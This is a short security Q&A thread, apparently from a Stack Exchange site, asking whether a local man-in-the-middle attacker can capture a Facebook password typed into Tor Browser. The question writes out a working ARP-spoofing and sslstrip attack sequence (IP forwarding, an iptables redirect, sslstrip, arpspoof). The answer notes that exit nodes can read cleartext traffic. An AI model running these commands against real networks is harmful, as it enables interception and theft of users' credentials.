2

Do I have to fear a local man-in-the-middle attacker while entering password with tor?

Say a victim is connecting to Facebook with tor Browser.

How would an attacker build a man-in-the-middle attack that get its password? (what precise commands)

If no proxy is used, the attacker would use

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p  tcp --destination-port 80 -j REDIRECT --to-port 54321
sslstrip -l 54321
arpspoof -i eth0  -t < targetIP > < gatewayIP > 
arpspoof -i eth0  -t < gatewayIP > < targetIP>
user123456
  • 520
  • 1
  • 4
  • 13

1 Answers1

1

I did a blog post on this here in 2012: http://security.blogoverflow.com/2012/04/tor-exploiting-the-weakest-link/

The fact is that an attacker can indeed launch attacks as you mention. The exit node will always be able to read the clear text traffic and maybe even indeed perform SSL strip like attacks.

Lucas Kauffman
  • 54,169
  • 17
  • 112
  • 196